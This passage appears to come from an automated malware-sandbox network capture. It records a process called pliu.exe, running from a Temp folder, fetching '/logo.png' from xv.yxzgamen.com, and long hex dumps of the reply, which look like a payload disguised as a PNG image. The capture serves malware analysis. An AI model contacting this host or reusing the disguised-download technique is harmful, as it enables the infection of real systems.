a5 6a 9e 53 e7 82 76 96 38 70 32 1a 0d 8c 45 a5 4e d5 5d af 68 be 96 15 26 d7 2a b0 5c c0 73 ec 55 a1 02 67 ab a3 6e 93
                                                                                    Data Ascii: =+b;lcE.>cd*J}i=RrQHRgAyTiIoOz}a^:V$jHfO}jj"-}5|XjG&%|{GwDjd:uRYEcjirFDcujTE`~qm3-ADjSv8p2EN]h&*\sUgn
                                                                                    2023-02-07 18:45:46 UTC845INData Raw: b3 cf 16 1a d7 f6 71 9c ab d5 18 da d6 1b 5e 2e aa 98 56 69 17 1b d6 73 00 64 55 98 17 4a f7 1a fb 7c 52 e5 9f d2 17 1b d6 1c 61 da 27 41 bc da d6 1b 3c 41 17 fe 83 da 07 ba d7 6e 56 5f 94 83 bd ab 67 6b bc dc 3a 5a 03 be d6 1a d6 fd 80 da 1f 62 17 d3 6f 1b 9c 93 95 eb 66 da d6 1b ed 90 17 3c 11 3a 17 1b d6 c1 bc da 57 2a 17 da 7e 73 d7 c7 c9 99 d3 da e3 c2 cf 1a b6 75 6d 9e f2 bf 17 1b d6 c8 c0 ae a6 3c dd f6 17 1b d6 db a6 da e3 9e 17 aa 26 5b d7 00 0b ad a6 3e 43 da d7 43 8e 1a f0 f6 9c 80 0d da c7 7a d7 02 61 0a 99 f1 bd 1a d6 1a 06 fb 97 fe 83 da 1e a2 d6 4a 48 55 4d c0 17 1b d6 5b 26 da 71 0c a7 da d6 1b c9 b4 17 aa d7 da d6 1b 6d d6 a5 1f 26 9a d7 b5 af 0d 71 7c d6 e9 c5 fa d7 4a 5f b3 a6 9e e3 da 22 9e d6 a5 d8 da ab 93 57 6f d6 1b 3d 00 e7 da 87
                                                                                    Data Ascii: q^.VisdUJ|Ra'A<AnV_gk:Zbof<:W*~sum<&[>CCzaJHUM[&qm&q|J_"Wo=
                                                                                    2023-02-07 18:45:46 UTC846INData Raw: 87 1b d7 1b 6e 13 17 0e 73 da 77 8f e2 1a 45 b8 97 1e 63 da d6 1b b8 78 f2 30 a5 ee 93 da d6 1b 93 ee 17 f2 54 b1 17 1b d6 b0 cd da 0f 72 17 1b d6 9a 5a d7 17 d6 ab da d6 1b a2 60 aa 68 ad b0 c7 da b7 0a d7 31 ec 78 a5 6f 13 14 08 7a d7 b3 6d 7b a5 8a e2 bf d6 8b 37 1a 29 f1 42 91 57 61 95 f1 8e 1a 29 f2 01 cf 42 94 39 8a d7 b9 be b7 43 9b 45 fa d7 0c d9 46 82 0b d7 ca 09 7e bf 68 83 be 55 78 c7 1a e5 05 ba 5a 37 2c 74 6f d6 1b 17 77 ba da 9b 26 d6 1a d6 d4 a9 da f3 8e 17 38 35 da d7 fc 2a c2 17 c9 77 1a 51 1e 39 45 91 6f ba 75 a5 fd 00 5a ad 04 f3 58 05 ba d7 e3 30 76 a5 c6 f3 42 47 52 df 1a 68 95 97 1e a3 1b 1f a2 d6 ec 3e 05 cb c6 17 1b d6 a8 d5 da 71 18 b3 da d6 1b 77 0a 17 d6 ab da d6 1b c7 2c a1 48 a5 a6 db da d6 1b 3f 5f ba da 7b 06 17 1b d6 ab d6
                                                                                    Data Ascii: nswEcx0TrZ`h1xozm{7)BWa)B9CEF~hUxZ7,tow&85*wQ9EouZX0vBGRh>qw,H?_{
                                                                                    2023-02-07 18:45:46 UTC851INData Raw: 97 9b 42 3a 93 1a c7 02 ac 6d a3 92 2f 1b d7 1b 90 b6 fc da d6 1a 9e 22 d7 c2 3f 5a 56 9e d3 1b 2f 55 14 6a 53 3c 07 6c 6b d6 d7 6a 72 b9 a5 6e bb 6f b8 6c 25 30 0f 1a 4f 85 a4 6e 93 ee 17 ab 17 1b 33 f7 aa 6e f7 8a 17 1b d6 c2 54 3b a9 1c 79 a2 b3 1a 3b c6 97 2c 01 fa d6 1a d6 d9 18 62 51 06 8d 9f 96 1a 96 56 ae 6e 33 4e 2e 67 8e 07 d7 ae 53 5a d6 b4 79 1b 01 c3 ac 7a b3 de e3 98 0d b2 d7 37 eb 7f 77 be 77 0a 17 0a b7 1a 20 dd 97 db 1f e1 ad 92 d7 2d f2 7c a3 1a a7 1b 14 90 9f 1a 48 91 c3 1e 13 da 57 ea d7 6a c2 1a b6 6e 8f 94 74 6f fd 4c ab 1a 06 fb 97 9b 54 cc 73 1a 00 19 65 78 91 25 72 b2 d7 ae 53 5a d6 1a 24 38 07 1a 1c c6 b4 6e 83 be 40 df b9 a6 d7 dd 08 76 91 c6 81 a2 d7 40 7e a9 97 6e d3 1b 52 ee d7 5e 8a 05 d5 1c 6d a3 d6 a2 df da d6 11 dc 1b b0
                                                                                    Data Ascii: B:m/"?ZV/UjS<lkjrnol%0On3nT;y;,bQVn3N.gSZyz7ww -|HWjntoLTsex%rSZ$8n@v@~nR^m


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    5192.168.2.349716188.114.97.3443C:\Users\user\AppData\Local\Temp\pliu.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:45:53 UTC856OUTGET /logo.png HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: xv.yxzgamen.com
                                                                                    2023-02-07 18:45:53 UTC857INHTTP/1.1 200 OK
                                                                                    Date: Tue, 07 Feb 2023 18:45:53 GMT
                                                                                    Content-Type: image/png
                                                                                    Content-Length: 59217
                                                                                    Connection: close
                                                                                    Last-Modified: Tue, 31 Jan 2023 07:35:43 GMT
                                                                                    ETag: "e751-5f38a611cd3c7"
                                                                                    Cache-Control: max-age=14400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 6931
                                                                                    Accept-Ranges: bytes
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=svrJKgMluEozMB5h09YFSdy6hvWiVKM64QiAimpvey8BLFLz7Pu5eGV2U1RV3Do8M%2BOZfCOZEOoMDHjMo8iZO6JXpwBiTNGC1SSZT%2FC%2B43hGM1gS9DAU3FXTxpJcmGnn1VE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 795e4903a873bb38-FRA
                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                    2023-02-07 18:45:53 UTC857INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 10 00 00 00 5c 08 06 00 00 00 a6 e7 ea b6 00 00 17 18 49 44 41 54 78 01 ed 5d 0b 94 1c 55 99 be 3a d3 81 c0 2e 82 c2 2a 82 08 12 10 90 05 92 aa 9a 84 90 d8 5d b7 7b b2 41 e2 41 81 28 b8 bb 0a 08 8a 1b 5c 84 98 05 e5 31 9a ae 9a 09 89 c0 02 0a 41 40 36 e1 81 06 17 10 1f 90 cc 24 01 f4 08 28 c8 43 58 58 7c 10 1e 64 fa 11 92 49 55 75 1e 99 64 7a ef b7 e6 b8 a4 b7 67 e6 bf d5 75 bb aa 87 fb 9d 73 4f e7 31 d3 d3 67 ea d6 57 ff fd ff ef ff 7e 16 07 66 76 ad db 2b ed 54 4c ee 7a a7 71 d7 9f 63 bb c1 65 b6 eb 3b dc f1 7b c4 df e7 8b bf 5f 22 d6 b9 d9 ee 60 56 da f5 8f 4e 77 55 77 67 1a 1a 1a ef 4c a4 7b 36 1f cc 9d ca 79 dc 0d ee b2 5d ff cf e2 b5 2a b3 32 79 6f bb 78 7d 5e 7c ef cd dc f5 ff 29 dd e5 ed cb
                                                                                    Data Ascii: PNGIHDR\IDATx]U:.*]{AA(\1A@6$(CXX|dIUudzgusO1gW~fv+TLzqce;{_"`VNwUwgL{6y]*2yox}^|)
                                                                                    2023-02-07 18:45:53 UTC858INData Raw: 8f 58 9f 15 44 e2 69 f2 d0 d0 04 92 10 70 27 b8 54 3e 59 19 5c 6f dc 54 4d b1 18 90 ed de 78 78 26 1f fc b7 26 0f 0d 4d 20 09 c8 7b f0 bc b7 4d 2a 51 ea 04 df 40 a2 93 c5 08 b4 f9 c3 43 84 69 68 68 02 89 07 5d 5d d5 77 73 d7 7f 4c 92 3c e6 31 0d 0d 0d 4d 20 82 0c 3e 2f 79 6c b9 86 1e 79 68 68 8c 59 68 02 99 79 ed d0 6e dc f5 d6 48 94 69 57 21 d9 ca 34 34 34 34 81 70 27 38 47 82 3c d6 a1 8c ca 34 34 34 34 81 20 f7 21 d3 24 27 92 95 5f 60 80 86 86 86 26 10 f4 ba c8 68 3d 40 38 0c d0 d0 d0 d0 04 c2 f3 c1 9d 54 02 41 6f 0c 03 34 34 34 34 81 a0 23 96 da 69 9b 71 fd 27 74 d5 a5 75 a0 a1 09 a4 da c5 de 8d c5 54 01 e2 2b 6a f4 41 53 79 6a 54 d3 e9 f6 75 dc e8 28 66 cd 79 c5 ac 75 77 81 1b bf 2d 65 8d 42 c9 b6 2a 85 ac 35 84 57 fc 1d ff 2e fe ff ae a2 6d 7e bd 9c
                                                                                    Data Ascii: XDip'T>Y\oTMxx&&M {M*Q@Cihh]]wsL<1M >/ylyhhYhynHiW!4444p'8G<4444 !$'_`&h=@8TAo4444#iq'tuT+jASyjTu(fyuw-eB*5W.m~
                                                                                    2023-02-07 18:45:53 UTC859INData Raw: 33 a8 7b ee 95 74 7a 77 99 72 70 d1 ee 98 51 27 02 f1 bf 4f 22 90 7c 70 f7 98 3f c2 e4 fd 8b ea 32 76 6e f2 91 82 10 76 48 d4 d2 1f 1c 98 36 6d 1f 16 02 d0 7b 40 90 26 75 46 b5 cd 8f b2 11 b0 65 c5 b8 23 c5 f1 63 87 c4 51 e5 67 d5 5e f6 1e 16 02 43 0f b1 f7 8a 23 ce 72 99 ca cc 96 87 c6 1d 31 aa d5 c4 4e b1 23 71 fd 11 92 83 b0 09 5a 54 77 92 40 20 90 a4 4b 44 a3 cf 23 ca 0d 59 51 5c 48 8c 42 9e c5 91 aa 36 2c bc 92 96 44 f5 1e 1c f3 11 88 13 5c 3c cc 85 5c 2a 71 21 ef ad 1a 46 8a 35 80 ea ec a3 c6 15 b3 d6 4f 24 7e e6 6d 6c 04 88 68 62 89 c4 b1 e2 9e 46 fb 59 aa 4f b2 94 78 9f fb 24 a2 9d 11 f3 6b 19 c7 3b 55 86 3c a6 3b c1 fe ac 01 80 7c 32 6e f0 56 d3 09 a4 f6 98 91 b5 7c 62 14 fa 5f 88 56 1a e9 db c2 51 9b f2 b3 10 55 d7 3a b0 cf 25 26 51 5f 1e eb 04
                                                                                    Data Ascii: 3{tzwrpQ'O"|p?2vnvH6m{@&uFe#cQg^C#r1N#qZTw@ KD#YQ\HB6,D\<\*q!F5O$~mlhbFYOx$k;U<;|2nV|b_VQU:%&Q_
                                                                                    2023-02-07 18:45:53 UTC861INData Raw: e9 1c ef 37 12 d2 e1 97 09 03 79 62 01 54 a5 e4 2e dc f9 fe df 0f 43 20 57 d0 ea f1 a6 9a 61 5b f2 2e 68 97 d5 10 c8 15 94 1b 77 fb ca d4 19 8a 75 20 67 12 d5 b0 f3 43 3e d0 be a7 f2 9e c0 10 aa 66 12 08 a1 91 92 6e 60 c5 cd fc 5b 33 cc 0f b1 66 01 73 6f 25 4d 78 1e 22 f4 c8 34 15 e9 05 95 03 a9 dd 94 10 d1 0d 7f e3 9a a7 13 2f d6 0f 98 42 60 68 10 d1 bf f2 33 ec 6d d8 de 97 3a 9d 56 3e 6d bb 45 71 19 f7 0e ca e7 c0 e7 dd c5 81 2c bf f9 10 e2 3e 7c 89 29 42 6e be 77 64 93 85 64 d8 77 3d 0d 3a f8 3f 02 43 21 9a cc 5d 01 30 40 4a 72 86 c6 d2 d9 cb aa 6d 2c 01 80 7a 51 90 da 6f c9 47 31 a7 72 f2 b0 12 e0 f4 e4 83 89 5d b8 eb c3 74 e1 52 65 c8 d4 b6 ee da 27 cd e6 d5 bb 1d 4c ac 7e bc 25 5a f8 95 7c 7e e4 57 44 72 d4 a3 7c 8e cd cb 77 3b a4 f6 e9 4f 95 17 a0
                                                                                    Data Ascii: 7ybT.C Wa[.hwu gC>fn`[3fso%Mx"4/B`h3m:V>mEq,>|)Bnwddw=:?C!]0@Jrm,zQoG1r]tRe'L~%Z|~WDr|w;O
                                                                                    2023-02-07 18:45:53 UTC862INData Raw: 9a 44 b0 7b 8b 65 a1 29 d0 ce 0f 1c ca 14 00 21 1c 21 ac 54 b4 8c 7b 1b a9 cd 03 d5 07 d8 1e 68 f5 8f 29 f2 78 00 43 a7 1a 6e 70 73 fd f9 ef 24 02 01 30 8f 05 89 d2 38 22 0f ba 6f 48 88 9a 39 66 ca 66 f2 c1 40 42 8e 2c 9b 60 85 a7 da 76 11 2e 64 45 6e 5d dd e4 0b b9 10 3f 37 42 93 9f ab 9b 4a 20 bd a9 ef 10 c6 66 92 81 41 52 2a a3 60 e4 5b 50 12 8e 9d 40 6a 12 ee c8 a7 35 71 cf fd be 90 35 3f c2 54 03 c2 2c 54 56 70 03 c7 73 5c 81 fd bf b7 04 19 75 d6 44 94 b2 1d 27 29 0e 2d 51 3e 5b 8b 11 13 4c 01 44 27 ee 49 22 09 da af 92 38 f0 fe 98 f4 af 46 4c 58 b1 60 2b a1 60 3f 55 60 54 04 55 75 92 08 04 78 79 e6 84 dd f0 30 41 45 44 2d 79 98 37 10 12 a6 d1 13 09 ca a5 b6 eb bd d6 ac 88 03 ea 43 94 7e 59 93 51 33 08 79 11 ca aa 51 db ce 95 b2 e6 95 aa 1b a5 44 3e
                                                                                    Data Ascii: D{e)!!T{h)xCnps$08"oH9ff@B,`v.dEn]?7BJ fAR*`[P@j5q5?T,TVps\uD')-Q>[LD'I"8FLX`+`?U`TUuxy0AED-y7C~YQ3yQD>
                                                                                    2023-02-07 18:45:53 UTC863INData Raw: 0a c9 36 fa 58 94 f0 33 0a c9 f5 36 0b c8 b8 7b 0a c9 d2 d7 be bb f4 37 0a c9 d2 d7 b6 b3 f4 37 0a c9 d2 d7 b4 b1 f4 37 0a c9 53 3b 0a 0b 9c 36 0a c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 15 45 00 4c 4d 04 05 c5 45 58 bb 63 00 00 00 00 00 00 00 e0 e0 02 23 2a 0a 09 08 00 70 70 00 00 50 50 00 00 00 00 00 de cc 12 00 00 10 10 00 00 80 80 00 00 00 00 10 10 10 10 00 00 10 10 00 04 04 00 00 00 00 00 00 04 04 00 00 00 00 00 00 00 e0 e0 00 00 10 10 00 3e 69 56 01 02 02 00 00 00 00 10 10 00 10 10 00 00 00 10 10 00 10 10 00 00 00 00 00 10 10 00 00 d0 4a 9a 00 40 40 00 00 24 b1 95 00 3c 3c 00 00 00 c0 c0 00 dc df 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 d0 00 34 33 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii: 6X36{777S;6PELMEXc#*ppPP>iVJ@@$<<43
                                                                                    2023-02-07 18:45:53 UTC865INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    2023-02-07 18:45:53 UTC866INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    2023-02-07 18:45:53 UTC867INData Raw: 10 99 84 1d a0 b0 10 99 b4 39 b4 b0 10 f8 5d a1 14 00 85 45 99 56 8b f7 8c 00 00 17 da 38 0a 00 85 45 b5 7f e2 10 ec 14 00 e9 89 9f 00 00 17 19 e2 13 00 ff ea 19 8c 80 10 b3 3b 22 ba 10 f8 44 be 12 00 a3 67 68 ac 10 f8 02 e6 0c 00 85 45 bd 7a ef 0e e0 06 00 eb 27 24 31 c8 11 00 85 45 bc 5c c8 b5 52 0f 00 85 45 bc 6b 7d 6a e8 15 fe 03 00 85 45 99 2c 7e f4 fa c5 6c ac 10 f9 45 ac 00 00 e8 19 ff 0e 00 eb 22 fa cc c4 fc b2 40 0c 04 fd 6c ac 10 1f 81 7a 0a 01 00 00 f2 cd 6c ac 10 29 04 01 8c b0 10 65 70 ed da 37 05 00 39 44 6d 65 0e 93 28 ce 0e 00 e8 68 86 06 00 e8 88 74 14 00 eb 81 e9 7b fa 77 2c b1 ad 43 06 00 68 7c 16 02 00 6a 6b e9 23 c0 0b 00 8b 7b cb cc ae 00 56 8b 2d 57 01 00 a9 a9 ca 39 ac a0 10 ef ca 79 fc b0 10 f8 47 aa 05 00 59 a6 2f 55 45 b4 63 40
                                                                                    Data Ascii: 9]EV8E;"DghEz'$1E\REk}jE,~lE"@lzl)ep79Dme(ht{w,Ch|jk#{V-W9yGY/UEc@
                                                                                    2023-02-07 18:45:53 UTC869INData Raw: ee 89 e0 3d 44 99 96 7f 86 ce a1 6f 8b 85 45 b4 9a 11 2f 3b 01 82 48 a1 81 10 a8 a4 9d 81 10 f8 ae b8 01 00 a6 31 40 a9 81 10 a8 9c a5 81 10 f8 de c8 01 00 a6 9e 82 b9 02 01 00 00 17 f7 1f 00 00 83 fe 6d 10 75 5d a1 bc 75 f0 b0 10 7a 62 e0 93 6d 16 00 59 a6 8a 7d e0 0e 1b 02 00 cc c5 b0 c5 fe 6d 10 74 7c 62 62 e0 8a 74 16 00 59 9a 2b 73 8a 11 00 c3 a9 6a 6a 6b fe 8b 50 28 e4 cd da 00 00 7c 47 c8 cf a9 6b 6b 6a 6a 6a e8 fe e9 00 00 7c 47 c8 cf 95 be 41 a9 00 00 8b 7b a6 be c0 36 1e 00 56 be ab 5e 1d 00 56 be c1 3e 17 00 56 be c5 30 1d 00 56 be f5 00 1d 00 56 be e5 16 1b 00 56 be 9d 7a 0f 00 56 be 18 ea 1a 00 68 17 69 16 10 f8 e2 0a 00 00 83 47 e0 87 ab a8 a0 10 4e 9d 95 a9 ca 25 b0 a0 10 9b be 09 bc 80 10 ef 29 53 45 b4 55 80 ad ac a0 10 93 7b 07 8b 63 47
                                                                                    Data Ascii: =DoE/;H1@mu]uzbmY}mt|bbtY+sjjkP(|Gkkjjj|GA{6V^V>V0VVVzVhiGN%)SEU{cG
                                                                                    2023-02-07 18:45:53 UTC870INData Raw: e0 b0 10 64 62 95 be 75 f8 b0 10 10 74 79 8e be 71 fc b0 10 10 74 70 81 45 b5 51 85 9d bc 80 10 b3 eb f8 b0 10 b1 e9 c8 80 10 d7 c2 41 f4 b0 10 aa ad 17 10 99 bc 79 fc b0 10 b3 f3 e0 b0 10 ef ea 55 c0 80 10 93 7b 07 5c b3 b0 a0 10 1f 8b 48 cc 00 00 ff ca 7d f8 b0 10 40 af 29 53 45 cf 8b 3f bb 00 00 e8 3b 29 05 00 00 ca 71 f4 b0 10 f8 fc ef 04 00 00 ca 7d f8 b0 10 b3 e7 f4 b0 10 f8 ec ff 04 00 00 ca 79 fc b0 10 b3 eb f8 b0 10 f8 1c 0e 05 00 00 ca 65 e0 b0 10 b3 ef fc b0 10 f8 0c 1e 05 00 7c 47 d4 b3 f3 e0 b0 10 f8 cf 37 10 00 85 45 b4 11 0d 11 60 19 10 ef ca 71 f4 b0 10 f8 c7 d4 04 00 a6 a6 2f 53 7b 07 5c af ac a0 10 64 3c 20 7c 16 02 00 6a 6b e9 fc 15 01 00 8b 7b 75 73 af 00 2d 40 62 a9 ca 39 ac a0 10 ef ca 79 fc b0 10 f8 14 06 05 00 a6 a6 2f 55 45 b4 6f
                                                                                    Data Ascii: dbutyqtpEQAyU{\H}@)SE?;)q}ye|G7E`q/S{\d< |jk{us-@b9y/UEo
                                                                                    2023-02-07 18:45:53 UTC871INData Raw: c0 a2 00 d0 b4 1d 90 b0 10 64 bf 40 be f1 68 ac 10 45 be ab 16 be 12 d7 2d 00 8b 63 ad c5 be 03 64 2d 5b 45 6b 54 bd 86 92 03 00 c4 f8 9a 00 d0 8e 73 3e 1c 03 05 b8 83 46 2d 00 83 47 c8 89 45 b4 79 5e 00 00 00 00 bb 0c e8 0c 00 83 47 d0 97 44 c3 07 f6 cd 26 6b c9 43 ca f1 68 ac 10 f8 80 93 04 00 76 94 d9 68 ac 10 99 96 d8 c2 85 3a ba 10 11 01 00 00 33 f3 99 04 02 01 05 98 3c ca 15 90 b0 10 f8 ab b8 04 00 76 94 3d 90 b0 10 93 4b 37 14 0f b1 de 67 bd da c6 5d 43 60 f3 f9 7c 4d 5e df 8e 8c 79 79 de 59 cb c6 00 01 00 00 74 7d 82 d6 55 8b c6 4d 0c 8d 9a 9a cc b9 7c be 1c 57 65 23 f3 f9 7c b9 4f 91 2d 9b 54 86 cf cc b9 17 d7 c3 f8 82 57 a6 7c 82 8c 8e 8a 40 cb dc 59 86 94 11 b9 75 93 16 ae ed 2b 2e 00 85 45 99 2d 67 ec f8 84 fe 71 0c 74 7e 81 c6 41 86 8c f9 ba
                                                                                    Data Ascii: d@hE-cd-[EkTs>F-GEy^GD&kChvh:3<v=K7g]C`|M^yyYt}UM|We#|O-TW|@Yu+.E-gqt~A
                                                                                    2023-02-07 18:45:53 UTC873INData Raw: 45 d2 53 7c 06 75 f1 b9 10 6c a6 84 a1 ca 79 f5 b9 10 45 aa ca 51 d5 b1 10 ef 2c 8c 04 a4 ca 51 d5 b1 10 ef ea 99 0c 80 10 99 a4 49 d5 b1 10 4d 9e 00 96 de 67 bd 00 07 be 64 7e 0d 00 74 7b 75 73 83 7b f1 8a 79 f3 ea 3d a8 80 10 f9 a4 4c 01 00 8b dd 0a fd 65 64 a0 10 47 dc f6 75 83 41 99 6a 00 4d 7a 85 53 b3 b0 d7 8f 42 cd 0f d9 e1 f0 b9 9c 85 ab cc 0f c1 f9 f3 bb 7b 31 00 4c 71 8f 4a 2a e9 31 f3 45 45 b4 7e 81 d3 50 8d 5e 52 d4 a1 89 7b f1 8a 79 f3 ea 3d a8 80 10 f9 12 fb 00 00 83 78 fe 70 79 8f e3 68 08 33 f3 80 a9 03 ea 00 00 83 78 fa 0e 8b 5a de 00 00 8b c5 2e e9 c4 b5 73 c6 41 85 c7 2e eb c3 4c 87 7a f1 07 8a 3d b8 00 00 8b 86 b5 18 a0 10 9b b6 81 1c a0 10 9b 5a d2 fa c2 ec aa 59 4f a2 c5 87 f5 22 df e7 5d 31 08 8b b6 85 18 a0 10 9b 96 a1 1c a0 10 52
                                                                                    Data Ascii: ES|ulyEQ,QIMgd~t{us{y=LedGuAjMzSB{1LqJ*1EE~P^R{y=xpyh3xZ.sA.Lz=ZYO"]1R
                                                                                    2023-02-07 18:45:53 UTC874INData Raw: ff e9 31 c5 9e 58 b7 87 10 43 06 bd 73 b1 2a 00 83 47 c8 89 45 b4 79 5b 00 00 00 00 be b5 5f 02 00 83 47 d0 eb cb c9 31 6c a0 10 43 06 bd 91 53 2a 00 83 47 c8 89 45 b4 79 5b 00 00 00 00 be d3 39 02 00 83 47 d0 7c 78 30 21 01 68 60 8f 87 10 45 bd 5f 9f 28 00 83 47 c8 e7 d8 59 9e 0b ea 71 e4 80 10 9b 63 d3 d5 9a 51 a6 7e 02 8b 54 4a 6a 8d c9 60 30 44 dd b9 c9 31 6c a0 10 ef c9 de 37 fd 22 00 59 09 af c9 63 aa ea bd 28 80 10 4d 02 01 05 02 9a a9 69 eb dc 1f 2b 00 83 7b f9 58 2d 61 7f 69 eb cf 0c 2b 00 85 45 99 2c 6a 9c be ed 7c ac 10 11 74 63 7e 94 fc 00 00 e8 dc ca 01 00 97 97 ff 00 00 e8 c2 d4 01 00 a6 00 9a 95 01 64 c5 49 3f 34 b4 10 93 bf c9 71 25 a1 10 11 74 6b 93 89 f1 75 21 a1 10 99 b1 50 c8 af 0f 00 ff cf b3 44 df f0 42 ad 07 00 85 45 99 00 2d 78 4a
                                                                                    Data Ascii: 1XCs*GEy[_G1lCS*GEy[9G|x0!h`E_(GYqcQ~TJj`0D1l7"Yc(Mi+{X-ai+E,j|tc~dI?4q%tku!PDBE-xJ
                                                                                    2023-02-07 18:45:53 UTC875INData Raw: 45 00 75 85 c3 fa af e7 f9 60 13 0a 0e 9b 55 4a 4a 02 0f 00 00 00 00 00 00 47 cf 60 20 8f c3 74 3f cb c7 b8 f6 55 47 05 59 b8 c6 77 35 e1 57 73 a1 da c9 4c 10 6e 68 95 f7 58 30 9f c3 44 37 c2 8b 7b 82 d3 50 0b da e2 c0 89 7e 8f 41 c3 82 43 e8 13 ed a4 94 d5 f3 9f 01 05 98 a9 62 60 c0 3b 93 10 f8 4e 50 09 00 7c e6 99 fc ba ba 00 00 10 42 ba 9b 8c 00 00 a6 dc 45 b4 49 b6 ce 4d 23 e9 92 02 ba 7a 6d 00 00 a6 00 dc 45 b4 5f a0 cb 64 e5 29 f7 e8 27 53 63 e1 c6 82 b9 02 01 00 00 14 cb ab ce a9 67 8b 8b 8b 33 fa f4 38 05 00 c0 cf 9b 55 4a 4a 02 48 ee 8d 2f 82 b9 02 01 00 00 cc f3 28 64 7a 09 00 3c a9 62 60 a0 5b 93 10 f8 d2 cc 09 00 17 2a 25 18 00 74 cb 38 fd 45 b4 62 95 e6 99 fc ff 2f 3b ec 34 f3 80 83 48 ee 8d 2f 82 b9 02 01 00 00 17 1d d3 26 00 e8 bb a5 09 00
                                                                                    Data Ascii: Eu`UJJG` t?UGYw5WsLnhX0D7{P~ACb`;NP|BEIM#zmE_d)'Scg38UJJH/(dz<b`[*%t8Eb/;4H/&
                                                                                    2023-02-07 18:45:53 UTC877INData Raw: 3f fe b1 7f 32 11 5d 72 57 b8 b1 bf 19 00 a6 da 44 d7 5b 3e bc 9f be a4 aa 19 00 a6 06 01 03 06 98 90 06 03 dd ff 50 34 47 dc b6 71 cc 80 10 46 a9 28 5c 0d 36 b0 00 00 85 45 b4 77 53 af 28 5c 0d 3e b8 00 00 85 45 b4 77 53 af 28 5c 0d 32 b4 00 00 85 45 b4 77 53 af 28 5c 0d 46 c0 00 00 85 45 b4 77 53 af 28 bd 6c 8b d3 0e 0d dc fa 83 b8 e4 a4 10 64 7d 82 88 86 45 b4 77 53 af 28 54 f8 87 fc 74 7e 81 c8 47 81 45 b4 77 53 af 28 54 40 d3 5d 38 ad 53 0d 52 d4 00 00 05 b1 b4 00 00 50 af 28 88 01 03 06 98 95 dd ff 50 2c 8d 73 82 0b 2c 06 02 dc b6 65 d8 80 10 46 a9 28 5c 0d 36 b0 00 00 85 45 b4 77 53 af 28 5c 0d 3e b8 00 00 85 45 b4 77 53 af 28 5c 0d 32 b4 00 00 85 45 b4 77 53 af 28 5c 0d 46 c0 00 00 85 45 b4 77 53 af 28 bd 6c 8b d3 0e 0d dc fa 83 b8 e4 a4 10 64 7d
                                                                                    Data Ascii: ?2]rWD[>P4GqF(\6EwS(\>EwS(\2EwS(\FEwS(ld}EwS(Tt~GEwS(T@]8SRP(P,s,eF(\6EwS(\>EwS(\2EwS(\FEwS(ld}
